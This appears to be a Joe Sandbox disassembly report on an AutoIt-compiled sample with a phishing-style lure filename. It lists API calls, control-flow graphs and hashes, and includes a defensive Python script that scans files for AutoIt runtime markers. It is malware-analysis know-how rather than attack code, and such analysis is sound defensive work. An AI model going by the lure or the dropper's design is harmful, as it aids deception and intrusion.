            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$CreateShow
            • String ID: AutoIt v3$edit
            • API String ID: 1584632944-3779509399
            • Opcode ID: 96d913728490f0c6a7f3fcdbed8c11224be755f354ccb0ac7808b93e1df37f0e
            • Instruction ID: bc1928245c095f50152c70f84fd4660ed78152b217205cd0181ffeb091dddf81
            • Opcode Fuzzy Hash: 96d913728490f0c6a7f3fcdbed8c11224be755f354ccb0ac7808b93e1df37f0e
            • Instruction Fuzzy Hash: EBF017746403907FEA311B276C88F273E7DE7C7F50B10002AB905E22A0C2E54800CAB6

            Control-flow Graph
            APIs
            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CBD5EC
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • _memset.LIBCMT ref: 00C8418D
            • _wcscpy.LIBCMT ref: 00C841E1
            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C841F1
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
            • String ID: Line:
            • API String ID: 3942752672-1585850449
            • Opcode ID: 289dd165e4f545b4da3fc72ceccaa595e037f991007b4f66a1c40355588b7f1c
            • Instruction ID: be0b58663be51cde800028ec19e1f34382164473a451f3b74656541762bfa1a0
            • Opcode Fuzzy Hash: 289dd165e4f545b4da3fc72ceccaa595e037f991007b4f66a1c40355588b7f1c
            • Instruction Fuzzy Hash: 3831D2710083156BD725FB60DC85BDF73E8AB46308F20461AB19A921A1EBB4D648D7AB

            Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the rendered graph is not preserved in this text dump)
            control_flow_graph 1055 ca564d-ca5666 1056 ca5668-ca566d 1055->1056 1057 ca5683 1055->1057 1056->1057 1059 ca566f-ca5671 1056->1059 1058 ca5685-ca568b 1057->1058 1060 ca568c-ca5691 1059->1060 1061 ca5673-ca5678 call ca8d68 1059->1061 1063 ca569f-ca56a3 1060->1063 1064 ca5693-ca569d 1060->1064 1069 ca567e call ca8ff6 1061->1069 1067 ca56b3-ca56b5 1063->1067 1068 ca56a5-ca56b0 call ca3020 1063->1068 1064->1063 1066 ca56c3-ca56d2 1064->1066 1072 ca56d9 1066->1072 1073 ca56d4-ca56d7 1066->1073 1067->1061 1071 ca56b7-ca56c1 1067->1071 1068->1067 1069->1057 1071->1061 1071->1066 1074 ca56de-ca56e3 1072->1074 1073->1074 1077 ca56e9-ca56f0 1074->1077 1078 ca57cc-ca57cf 1074->1078 1079 ca56f2-ca56fa 1077->1079 1080 ca5731-ca5733 1077->1080 1078->1058 1079->1080 1081 ca56fc 1079->1081 1082 ca579d-ca579e call cb0df7 1080->1082 1083 ca5735-ca5737 1080->1083 1084 ca57fa 1081->1084 1085 ca5702-ca5704 1081->1085 1094 ca57a3-ca57a7 1082->1094 1087 ca575b-ca5766 1083->1087 1088 ca5739-ca5741 1083->1088 1093 ca57fe-ca5807 1084->1093 1091 ca570b-ca5710 1085->1091 1092 ca5706-ca5708 1085->1092 1089 ca576a-ca576d 1087->1089 1090 ca5768 1087->1090 1095 ca5743-ca574f 1088->1095 1096 ca5751-ca5755 1088->1096 1098 ca576f-ca577b call ca4916 call cb10ab 1089->1098 1099 ca57d4-ca57d8 1089->1099 1090->1089 1091->1099 1100 ca5716-ca572f call cb0f18 1091->1100 1092->1091 1093->1058 1094->1093 1101 ca57a9-ca57ae 1094->1101 1097 ca5757-ca5759 1095->1097 1096->1097 1097->1089 1116 ca5780-ca5785 1098->1116 1103 ca57ea-ca57f5 call ca8d68 1099->1103 1104 ca57da-ca57e7 call ca3020 1099->1104 1115 ca5792-ca579b 1100->1115 1101->1099 1102 ca57b0-ca57c1 1101->1102 1107 ca57c4-ca57c6 1102->1107 1103->1069 1104->1103 1107->1077 1107->1078 1115->1107 1117 ca578b-ca578e 1116->1117 1118 ca580c-ca5810 1116->1118 1117->1084 1119 ca5790 1117->1119 1118->1093 1119->1115
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
            • String ID:
            • API String ID: 1559183368-0
            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
            • Instruction ID: e92c2fd1dc838075a6f4e442f69c3734d7e46913cb7e56d113cbe7e97a4a53b5
            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
            • Instruction Fuzzy Hash: 14519171A10B07DBDB248EA988846AE77B5AF42328F64C629F835E62D0D7709E549B40

            Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the rendered graph is not preserved in this text dump)
            control_flow_graph 1120 c869ca-c869f1 call c84f3d 1123 cbe45a-cbe46a call ce97e5 1120->1123 1124 c869f7-c86a05 call c84f3d 1120->1124 1128 cbe46f-cbe471 1123->1128 1124->1123 1129 c86a0b-c86a11 1124->1129 1130 cbe473-cbe476 call c84faa 1128->1130 1131 cbe490-cbe4d8 call ca0ff6 1128->1131 1133 cbe47b-cbe48a call ce4534 1129->1133 1134 c86a17-c86a39 call c86bec 1129->1134 1130->1133 1139 cbe4da-cbe4e4 1131->1139 1140 cbe4fd 1131->1140 1133->1131 1143 cbe4f8-cbe4f9 1139->1143 1144 cbe4ff-cbe512 1140->1144 1145 cbe4fb 1143->1145 1146 cbe4e6-cbe4f5 1143->1146 1147 cbe689-cbe69a call ca2f95 call c84faa 1144->1147 1148 cbe518 1144->1148 1145->1144 1146->1143 1157 cbe69c-cbe6ac call c87776 call c85efb 1147->1157 1150 cbe51f-cbe522 call c875e0 1148->1150 1154 cbe527-cbe549 call c85f12 call ce768b 1150->1154 1163 cbe54b-cbe558 1154->1163 1164 cbe55d-cbe567 call ce7675 1154->1164 1171 cbe6b1-cbe6e1 call cdfcb1 call ca106c call ca2f95 call c84faa 1157->1171 1166 cbe650-cbe660 call c8766f 1163->1166 1173 cbe569-cbe57c 1164->1173 1174 cbe581-cbe58b call ce765f 1164->1174 1166->1154 1176 cbe666-cbe670 call c874bd 1166->1176 1171->1157 1173->1166 1183 cbe59f-cbe5a9 call c85f8a 1174->1183 1184 cbe58d-cbe59a 1174->1184 1182 cbe675-cbe683 1176->1182 1182->1147 1182->1150 1183->1166 1190 cbe5af-cbe5c7 call cdfc4d 1183->1190 1184->1166 1195 cbe5ea-cbe5ed 1190->1195 1196 cbe5c9-cbe5e8 call c87f41 call c85a64 1190->1196 1198 cbe61b-cbe61e 1195->1198 1199 cbe5ef-cbe60a call c87f41 call c86999 call c85a64 1195->1199 1219 cbe60b-cbe619 call c85f12 1196->1219 1201 cbe63e-cbe641 call ce7621 1198->1201 1202 cbe620-cbe629 call cdfb6e 1198->1202 1199->1219 1209 cbe646-cbe64f call ca106c 1201->1209 1202->1171 1212 cbe62f-cbe639 call ca106c 1202->1212 1209->1166 1212->1154 1219->1209
            APIs
              • Part of subcall function 00C84F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84F6F
            • _free.LIBCMT ref: 00CBE68C
            • _free.LIBCMT ref: 00CBE6D3
              • Part of subcall function 00C86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C86D0D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _free$CurrentDirectoryLibraryLoad
            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
            • API String ID: 2861923089-1757145024
            • Opcode ID: 802973fd2f229de42bf2fe0a692efa660017fcf7249ed6176e799878d6cc8171
            • Instruction ID: d6f6b62ad1d0f2b5691ecb94f525cdd9300a09b3c38ae3a2352734b8e30e3098
            • Opcode Fuzzy Hash: 802973fd2f229de42bf2fe0a692efa660017fcf7249ed6176e799878d6cc8171
            • Instruction Fuzzy Hash: 40918D71910219AFCF14EFA5CC819EDB7B4FF19718F14442AF816AB291EB30AE05DB64

            Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the rendered graph is not preserved in this text dump)
            control_flow_graph 1224 c835b0-c835bb 1225 c835bd-c835c2 1224->1225 1226 c8362f-c83631 1224->1226 1225->1226 1228 c835c4-c835dc RegOpenKeyExW 1225->1228 1227 c83620-c83625 1226->1227 1228->1226 1229 c835de-c835fd RegQueryValueExW 1228->1229 1230 c835ff-c8360a 1229->1230 1231 c83614-c8361f RegCloseKey 1229->1231 1232 c8360c-c8360e 1230->1232 1233 c83626-c8362d 1230->1233 1231->1227 1234 c83612 1232->1234 1233->1234 1234->1231
            APIs
            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C835A1,SwapMouseButtons,00000004,?), ref: 00C835D4
            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C835A1,SwapMouseButtons,00000004,?,?,?,?,00C82754), ref: 00C835F5
            • RegCloseKey.KERNELBASE(00000000,?,?,00C835A1,SwapMouseButtons,00000004,?,?,?,?,00C82754), ref: 00C83617
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: Control Panel\Mouse
            • API String ID: 3677997916-824357125
            • Opcode ID: 8c62fcabd7485c664e1cd27493e0fd3e1ee10ad4b50c9952f3186e7a542e3444
            • Instruction ID: 890db2db498e0bacee78fff9c4c8ac67bdb5d32d8a429985a161484934e0f5e1
            • Opcode Fuzzy Hash: 8c62fcabd7485c664e1cd27493e0fd3e1ee10ad4b50c9952f3186e7a542e3444
            • Instruction Fuzzy Hash: D1115A71510248BFDB209F68DC40EEEB7B8FF04B44F109469F809D7210E2719F409768
            APIs
              • Part of subcall function 00C85045: _fseek.LIBCMT ref: 00C8505D
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AAE
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AC1
            • _free.LIBCMT ref: 00CE992C
            • _free.LIBCMT ref: 00CE9933
            • _free.LIBCMT ref: 00CE999E
              • Part of subcall function 00CA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00CA9C64), ref: 00CA2FA9
              • Part of subcall function 00CA2F95: GetLastError.KERNEL32(00000000,?,00CA9C64), ref: 00CA2FBB
            • _free.LIBCMT ref: 00CE99A6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
            • String ID:
            • API String ID: 1552873950-0
            • Opcode ID: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
            • Instruction ID: 5e5345e2bbdf6fd9360ca3334fd7d9fabc3bf92ecb08c8c73c094b6d7240690d
            • Opcode Fuzzy Hash: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
            • Instruction Fuzzy Hash: C0515DB1904258AFDF249F65CC81A9EBBB9EF48314F1044AEF609A7281DB715E80DF58
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
            • String ID:
            • API String ID: 2782032738-0
            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
            • Instruction ID: d65ed98dbd478796854fd81c24ae378e1a6a84241bdbe598ec534898a1e75e9c
            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
            • Instruction Fuzzy Hash: 6541D5716007079BDF2CCEB9C8809AF77AAEFC6368B24813DE865C7640D7B09E519B44
            APIs
            • _memset.LIBCMT ref: 00C84560
              • Part of subcall function 00C8410D: _memset.LIBCMT ref: 00C8418D
              • Part of subcall function 00C8410D: _wcscpy.LIBCMT ref: 00C841E1
              • Part of subcall function 00C8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C841F1
            • KillTimer.USER32(?,00000001,?,?), ref: 00C845B5
            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C845C4
            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CBD6CE
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
            • String ID:
            • API String ID: 1378193009-0
            • Opcode ID: f549f63d42a494fce7d4f3f1dab63ddf1910bfa8523381888e6f78e0fe0a9a1b
            • Instruction ID: bb516c27ea6e2bf1f5d1775c8fa3fa36b0e7a52db538ad59d79ddeac1f3ae849
            • Opcode Fuzzy Hash: f549f63d42a494fce7d4f3f1dab63ddf1910bfa8523381888e6f78e0fe0a9a1b
            • Instruction Fuzzy Hash: 5821F970904784AFEB329B24DC55BEBBBEC9F01308F04049EE69E96241D7B45B84DB55
            APIs
            • _memset.LIBCMT ref: 00CBEE62
            • GetOpenFileNameW.COMDLG32(?), ref: 00CBEEAC
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
              • Part of subcall function 00CA09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CA09F4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Name$Path$FileFullLongOpen_memset
            • String ID: X
            • API String ID: 3777226403-3081909835
            • Opcode ID: 4e7ed098e6cba11840c26bd49f224b14ef6e46d542b42e2c8a912021ae893910
            • Instruction ID: 3c6a38bbbfe27b8a75565c7e7db1c73c347137b8095bc6ec898afb80d2fe69e1
            • Opcode Fuzzy Hash: 4e7ed098e6cba11840c26bd49f224b14ef6e46d542b42e2c8a912021ae893910
            • Instruction Fuzzy Hash: 7921C670A002989BCB11EF94C845BEEBBF89F49718F10405AE408E7381DBF499499FA5
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __fread_nolock_memmove
            • String ID: EA06
            • API String ID: 1988441806-3962188686
            • Opcode ID: ee3653eb8539f7f8f3cab78838e3d8676243ce99fd6a98a9f3d16ff0da362189
            • Instruction ID: 8f6b9e24fb01f364b02b251d1f94e9b68c4637ad4f7298e100ae77f3cbad5efa
            • Opcode Fuzzy Hash: ee3653eb8539f7f8f3cab78838e3d8676243ce99fd6a98a9f3d16ff0da362189
            • Instruction Fuzzy Hash: F701F9719042586EDB28C7A9C81AEEE7BF8DB05305F00819AF552D2181E579AB089760
            APIs
            • GetTempPathW.KERNEL32(00000104,?), ref: 00CE9B82
            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CE9B99
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Temp$FileNamePath
            • String ID: aut
            • API String ID: 3285503233-3010740371
            • Opcode ID: e9d858fb727333dc156bb98197f414e4312f5fdb8d9bc4b998ad190b0c095e49
            • Instruction ID: 5333bc204c87b338024b3b14f0ddedd8d56c8edcf2cc9ceda19a80f68641a678
            • Opcode Fuzzy Hash: e9d858fb727333dc156bb98197f414e4312f5fdb8d9bc4b998ad190b0c095e49
            • Instruction Fuzzy Hash: 00D05E7A54030DABDB209BA4EC0EF9A772CE704704F0042A1BE98D11A1DEB065988BA5
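The strings referenced by the functions above (">>>AUTOIT SCRIPT<<<", ">>>AUTOIT NO CMDEXECUTE<<<", "AutoIt v3", the "EA06" tag read next to _fread_nolock, and the "aut" prefix passed to GetTempFileNameW) are AutoIt v3 runtime artefacts, not behaviour of the injected payload, and they are what a triage step should key on when deciding whether a dropper is an AutoIt-compiled wrapper. The script below is an added example for this report, not Joe Sandbox or AutoIt project code: it searches a file for those markers in both ASCII and UTF-16LE form (the runtime calls wide-character APIs, so resource strings may be stored either way) and reports offsets. Assumptions: "EA06" is treated as the subtype tag of an AutoIt3 compiled-script resource, as public AutoIt extractors treat it, and because four printable bytes collide easily it never decides the verdict on its own; the "aut" prefix is too short to search for and is left out; the sample bytes are constructed for the demonstration and are not taken from the analysed file.

```python
"""Triage check: does a file carry the AutoIt v3 runtime strings listed above?

Added example for this report; not Joe Sandbox or AutoIt code.
"""
import sys
from typing import Dict, Iterator, List, Tuple

# Strings the AutoIt v3 runtime references in the disassembly above.
# Any one of these is a strong indicator of an AutoIt-compiled binary.
STRONG_MARKERS: Tuple[bytes, ...] = (
    b">>>AUTOIT SCRIPT<<<",
    b">>>AUTOIT NO CMDEXECUTE<<<",
    b"AutoIt v3",
)

# Assumption: "EA06" is the subtype tag of an AutoIt3 compiled-script
# resource (as public AutoIt extractors treat it). Four printable bytes
# collide easily, so it is reported but never decides the verdict alone.
WEAK_MARKERS: Tuple[bytes, ...] = (b"EA06",)


def _needles(marker: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield the ASCII and the UTF-16LE encoding of a marker.

    The runtime calls wide-character APIs (LoadStringW, GetTempFileNameW),
    so resource strings may be stored as UTF-16LE rather than ASCII.
    """
    yield "ascii", marker
    yield "utf-16le", marker.decode("ascii").encode("utf-16-le")


def find_markers(data: bytes) -> Dict[str, List[int]]:
    """Return {marker: [offsets]} for every marker found in either encoding."""
    hits: Dict[str, List[int]] = {}
    for marker in STRONG_MARKERS + WEAK_MARKERS:
        offsets: List[int] = []
        for _, needle in _needles(marker):
            pos = data.find(needle)
            while pos != -1:
                offsets.append(pos)
                pos = data.find(needle, pos + 1)
        if offsets:
            hits[marker.decode("ascii")] = sorted(offsets)
    return hits


def is_likely_autoit(data: bytes) -> bool:
    """True when at least one strong marker is present; weak ones do not count."""
    hits = find_markers(data)
    return any(m.decode("ascii") in hits for m in STRONG_MARKERS)


def scan_file(path: str) -> Dict[str, List[int]]:
    """Read a file from disk and return its marker offsets."""
    with open(path, "rb") as fh:
        return find_markers(fh.read())


# Constructed sample input, not bytes from the analysed file: a stub MZ
# header, "AutoIt v3" stored as UTF-16LE, the EA06 tag, and the script
# header in ASCII. Offsets: UTF-16LE "AutoIt v3" at 64, "EA06" at 98,
# ">>>AUTOIT SCRIPT<<<" at 110.
SAMPLE = (
    b"MZ\x90\x00" + bytes(60)
    + "AutoIt v3".encode("utf-16-le") + bytes(16)
    + b"EA06" + bytes(8)
    + b">>>AUTOIT SCRIPT<<<" + bytes(4)
)
# Constructed negative case: a stub header with no markers at all.
BENIGN = b"MZ\x90\x00" + bytes(100)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            blob = fh.read()
        verdict = "strong AutoIt markers present" if is_likely_autoit(blob) else "no strong AutoIt markers"
        print(f"{path}: {verdict}")
        for marker, offsets in find_markers(blob).items():
            print(f"  {marker!r} at {[hex(o) for o in offsets]}")
```

Run it as `python autoit_markers.py sample.exe` to list the markers and their file offsets. A hit on a strong marker says only that the AutoIt runtime is present; the script the dropper carries still has to be extracted and read to see what it injects, which is why the check is a triage step rather than a verdict on the payload.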
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 534bcc266ea24733e09a63af6039681a77f20353e19b3dd7c5d6c626a655e5ed
            • Instruction ID: 8d1143dbef3b9657489b03656897cd2a271b364935381bc8dfd36fd610cbea8a
            • Opcode Fuzzy Hash: 534bcc266ea24733e09a63af6039681a77f20353e19b3dd7c5d6c626a655e5ed
            • Instruction Fuzzy Hash: C0F15A70A083059FC754DF28C480A6ABBE5FF88314F14892EF99A9B351DB31E945CF82
            APIs
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CA03D3
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00CA03DB
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CA03E6
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CA03F1
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00CA03F9
              • Part of subcall function 00CA03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00CA0401
              • Part of subcall function 00C96259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C8FA90), ref: 00C962B4
            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C8FB2D
            • OleInitialize.OLE32(00000000), ref: 00C8FBAA
            • CloseHandle.KERNEL32(00000000), ref: 00CC49F2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
            • String ID:
            • API String ID: 1986988660-0
            • Opcode ID: 86c755f68724e75697e35c403d88aba3575559af1fc3a00ef46360ead7fe5402
            • Instruction ID: 1a36961c37d6c9af7e6806ca7277f36c7f5053c74f0fc87f280f8d5c3bbe2daa
            • Opcode Fuzzy Hash: 86c755f68724e75697e35c403d88aba3575559af1fc3a00ef46360ead7fe5402
